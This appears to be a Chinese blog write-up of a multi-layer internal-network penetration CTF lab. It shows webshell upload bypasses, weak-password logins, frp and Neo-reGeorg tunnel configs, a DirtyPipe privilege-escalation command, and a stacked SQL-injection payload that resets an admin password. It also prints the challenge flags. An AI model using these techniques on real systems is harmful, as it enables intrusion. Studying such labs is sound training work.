之前写了一篇frp的利用方法,这次咱们以实战的角度来深入的学习frp的使用以及基本的内网渗透的方式。
第一层
信息泄露
Tips:先尝试进行最简单的信息收集吧~
在 robots.txt 中发现账号密码和 flag
User-agent:*
Disallow:/admin/
Disallow:/user/
Disallow:/admin:admin888
Disallow:flag{9e3f0ff79b5393c99beb9a6ceba19597}后台
tips:后台有输入限制锁定,看看哪边能找到登录的用户名和密码吧~
使用前面得到的账号密码直接登录,在 网站设置 里得到 flag
webshell
尝试上传个webshell看看吧,出题人为降低难度,把过滤都给删了
没任何过滤直接找个上传点上传即可,在 C:/phpstudy_pro/发现 flag
flag{701c559f41d73ecb0d7560f8429470fd}
提权
tisp:出题人为降低难度,把第一层的提权给删了,白送一个flag
确实白送,直接在 Administrator 用户的桌面得到 flag 以及下一题的附件
数据安全
某企业程序员针对内网环境所涉及的文件交互进行了安全防护。某红客渗透测试过程中,针对流量进行分析,发现其安全防护存在漏洞,可以通过某些手段获取其中的文件信息。请分析靶机桌面提供的wireshark压缩包,分析出文件信息。
FTP-DATA 流量,直接导出即可
zip 文件存在加密,同时 txt 文件给出了掩码 HelloHOLO_xxxxxx 直接爆破即可
flag{e1ea931b9e669bc9bed22dc0dd710359}
第二层
数据库
tips:赶紧搭建代理进入第二层吧,为降低难度,出题人把过滤给删除了~
通过 arp -a 发现双网卡
直接传个 fscan 扫一扫 10.10.10.10/24 看看有没有什么资产
[*] WebTitle: http://10.10.10.20 code:200 len:3083 title:人力HR-员工信息维护系统
[*] NetBios: 10.10.10.10 WORKGROUPWIN-IFPVISPB8CQ Windows Server 2012 R2 Datacenter 9600
[+] mysql:10.10.10.20:3306:root 123456
[*] WebTitle: http://10.10.10.10 code:200 len:18668 title:zzcms专业做招商网的程序源码那没啥好说的, 3306 弱口令直接连上得到 flag
后台
根据前面 fscan 的结果来看存在一个网站,由于不出网我们直接使用 Neo-reGeorg 正向代理映射出来
python neoreg.py generate -k password
python neoreg.py -k password -u http://<马赛克>/tunnel.php
映射后直接使用弱密码 admin:admin888 登录后台,得到 flag
这里在提供一种 Frp 代理的方法
# frps.ini
[common]
Bind_addr = 0.0.0.0
bind_port = 7000
# frpc.ini
[common]
server_addr = 服务器地址
server_port = 7000
[plugin_socks6]
type = tcp
remote_port = 7779
plugin = socks5
# socks5
socks5://服务器地址:7779webshell
tips:这次是有过滤的哦~
直接个人照片处上传木马即可,过滤直接通过后缀大小写混写绕过
在 /var/www/flag 得到 flag
提权
通过内核探针 linux-exploit-suggester.sh 扫描发现为 CVE-2022-0847
# 编译
gcc dirtypipez.c -o dirtypipez
# 查找 SUID
find / -perm -u=s -type f 2>/dev/null
# 提权
./dirtypipez /usr/bin/su但是由于哥斯拉一直得不到交互式shell,所以我们用冰蝎的虚拟终端中转下吧
flag{c79a9b423622434c35d0a2099c7dbb07}
ps: 后期突然发现哥斯拉有一个 superTerminal 功能...
数据安全
运维管理员在运维服务器过程中被黑客进行了流量抓取,记录了运维管理员的相关操作,黑客把数据包放在了站点路径下,请选手获取数据包并进行分析,分析出文件信息。
通过前面上传的 Webshell 在 /var/www/html 中得到 EasyUSB.zip
直接脚本跑一下得到解析后的内容,简单格式化一下代码后运行即可。
from Crypto.Cipher import DES
key = b'20232023'
ad = b'flagdesencrypt!!'
cipher = DES.new(key,DES.MODE_ECB)
enc = cipher.encrypt(ad)
flag = enc.hex()
print(flag)
# fab588adc8fb6741c949fe74dbf613a1第三层
信息泄露
Tips:进入第三层,白送一个flag
首先 fscan 扫一下发现 20.20.20.30 存在一个网站
[*] WebTitle:http://20.20.20.30 code:302 len:0 title:None 跳转url: http://20.20.20.30?m=login
[*] WebTitle:http://20.20.20.20 code:200 len:3083 title:人力HR-员工信息维护系统
[*] WebTitle:http://20.20.20.30:8899 code:200 len:45 title:None
[*] WebTitle:http://20.20.20.30?m=login code:200 len:4012 title:信呼协同办公系统
[+] mysql:20.20.20.20:3306:root 123456
[*] WebTitle:http://20.20.20.30:9080 code:404 len:111 title:404 File not found
[+] mysql:20.20.20.30:3306:root root这里就需要二层代理了,我们既要运行 frps 又要运行 frpc
# 第一层 frps.ini
[common]
Bind_addr = 0.0.0.0
bind_port = 7000
# 第一层 frpc.ini
[common]
server_addr = 服务器地址
server_port = 7000
[plugin_socks6]
type = tcp
remote_port = 7779
plugin = socks5
# socks5
socks5://服务器地址:7779
# 第二层 frpc.ini
[common]
server_addr = 10.10.10.10
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 700
plugin = socks5然后我们通过 Proxifier 配置个代理链
依旧是在 robots.txt 发现 flag
flag{a0e9b4a803a1f9fa510aba179fbed179}后台
通过上面我们得到的 mysql 弱口令连接后得到密码 md5
62c8ad0a15d9d1ca38d5dee762a16e01:1234qwer
登陆后在 公告 中发现 flag
flag{559e179db083aa9e3ca4174fa43804e6}
webshell
信呼OA 文件上传漏洞 CVE-2023-1501,直接跟着复现即可
在 /www/admin/localhost_80 发现 flag
提权
找了半天内核漏洞,发现都不是,突然想起来 fscan 还扫出来一个网站
[*] WebTitle:http://20.20.20.30:9080 code:404 len:111 title:404 File not found访问后发现为小皮面板,注意请求的时候加个请求头,不然报 404
X-Requested-With: XMLHttpRequest
一开始先入为主,以为是 XSS + CSRF 通过计划任务实现 RCE,参考我以前的文章 PHPStudy RCE 分析 ,可等了半天 XSS 也没被触发, 没办法百度搜索一番还有一个堆叠注入,我们直接修改管理员密码为 123456
admin';UPDATE ADMINS set PASSWORD = 'c26be8aaf53b15054896983b43eb6a65' where username = 'admin';--
通过计划任务得到 flag
flag{c06384d8254dfd903191d205a5fafd4a}
END
往期文章推荐
| frp的基本使用方法 |
| 记一次攻防演练从任意文件读取到拿下整个域控 |
| 文件上传的绕过方法(一) |
| 校友邦小程序签到加密逻辑解析 |
| 记一次攻防演练利用微信公众号文件上传获取shell |
关注我,让我们一起学习网络安全。
原文始发于微信公众号(FTC安全):记一次内网渗透之旅
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论